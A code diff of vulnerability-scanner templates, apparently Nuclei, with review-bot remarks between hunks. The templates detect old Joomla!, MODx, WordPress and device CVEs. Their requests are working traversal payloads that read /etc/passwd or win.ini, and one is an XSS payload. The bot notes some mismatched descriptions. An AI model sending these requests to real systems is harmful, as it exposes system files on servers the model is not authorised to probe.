tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1714
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12168
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1714
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1717
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12291
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1717
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1718
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12282
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1718
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1722
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Online Market 2.x - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12177
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1722
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1875
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Property - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11851
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1875
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
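Review bot: The `name:` field reads "Joomla! Component Property", which drops both the product name and the version that the description gives ("Real Estate Property (com_properties) component 3.1.22-03"). The sibling templates carry the component name and version in `name:`; suggest doing the same here so the finding can be identified from the title alone.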
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1953
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12288
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1953
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1954
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12287
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1954
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1955
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12238
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1955
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/12088
|
- https://www.exploit-db.com/exploits/12088
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-1979
|
- https://www.cvedetails.com/cve/CVE-2010-1979
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1980
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12085
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1980
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
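Review bot: The `name:` field says "Joomla! Flickr 1.0" while `description:` says the affected component is "1.0.3". Suggest making the two agree so that the version in the finding title matches the advisory text.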
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1981
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12087
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1981
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
|
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/12055
|
- https://www.exploit-db.com/exploits/12055
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-1983
|
- https://www.cvedetails.com/cve/CVE-2010-1983
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2033
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2033
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
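Review bot: The `description:` field describes a different component from the one this template tests. The name is "Percha Categories Tree 0.6" and the request uses `option=com_perchacategoriestree`, but the description reads "Percha Fields Attach (com_perchafieldsattach) component 1.x", which is word for word the description in the CVE-2010-2036 template added in this same commit. Suggest replacing it with the text for CVE-2010-2033 so that triage does not point at the wrong component.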
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2035
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34006
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2035
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2036
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34004
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2036
|
||||||
|
tags: cve,cve2010,lfi,joomla
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
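Review bot: The `tags:` line is ordered `cve,cve2010,lfi,joomla`, while every other Joomla! template in this commit uses `cve,cve2010,joomla,lfi`. Tag order has no effect on filtering, but keeping one order makes the files easier to diff and grep. The `name:` field also says "1.0" where `description:` says "1.x"; suggest aligning them.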
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2122
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12623
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2122
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
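Review bot: The `description:` field names the `controller` parameter, but the request in `path:` exercises `fileid` together with `task=download`, and there is no `controller` parameter in the URL at all. The title also says "Local File Disclosure" while the description says "include and execute arbitrary local files". Suggest rewording the description to cover the parameter and impact that this request actually checks, so that a finding can be traced back to the right input.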
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/10946
|
- https://www.exploit-db.com/exploits/10946
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-2259
|
- https://www.cvedetails.com/cve/CVE-2010-2259
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.securityfocus.com/bid/40550/info
|
- https://www.securityfocus.com/bid/40550/info
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
||||||
tags: cve,cve2010,iot,lfi
|
tags: cve,cve2010,iot,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/14017
|
- https://www.exploit-db.com/exploits/14017
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-2682
|
- https://www.cvedetails.com/cve/CVE-2010-2682
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-3426
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/14964
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-3426
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
||||||
- https://www.exploit-db.com/exploits/15505
|
- https://www.exploit-db.com/exploits/15505
|
||||||
tags: cve,cve2010,iot,lfi
|
tags: cve,cve2010,iot,lfi
|
||||||
|
|
|
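Review bot: The `description:` context line reads "directory transversal attacks"; this should be "directory traversal". Since this hunk already touches the info block, the typo could be fixed in the same change.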
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/15791
|
- https://www.exploit-db.com/exploits/15791
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-4617
|
- https://www.cvedetails.com/cve/CVE-2010-4617
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2010-5278
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MODx manager - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34788
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-5278
|
||||||
|
tags: cve,cve2010,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "bit app support"
|
||||||
|
- "fonts"
|
||||||
|
- "extensions"
|
||||||
|
condition: and
|
||||||
|
part: body
|
|
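Review bot: The only request path targets `windows/win.ini`, and the word matchers (`bit app support`, `fonts`, `extensions`) are win.ini strings, so this template reports only Windows-hosted installs, and neither `name:` nor `description:` says so. Suggest either documenting that scope in `description:` or covering non-Windows hosts the way the sibling templates in this commit do. The `tags:` line is also just `cve,cve2010,lfi` with no product tag, whereas the Joomla! templates carry `joomla`; a `modx` tag would let the template be selected by product.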
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
|
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
||||||
- https://www.exploit-db.com/exploits/17119
|
- https://www.exploit-db.com/exploits/17119
|
||||||
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/36598
|
- https://www.exploit-db.com/exploits/36598
|
||||||
- https://www.cvedetails.com/cve/CVE-2011-4804
|
- https://www.cvedetails.com/cve/CVE-2011-4804
|
||||||
tags: cve,cve2011,joomla,lfi
|
tags: cve,cve2011,joomla,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/36650
|
- https://www.exploit-db.com/exploits/36650
|
||||||
- https://www.cvedetails.com/cve/CVE-2012-0991
|
- https://www.cvedetails.com/cve/CVE-2012-0991
|
||||||
tags: cve,cve2012,lfi,openemr
|
tags: cve,cve2012,lfi,openemr
|
||||||
|
|
|
@ -12,10 +12,10 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
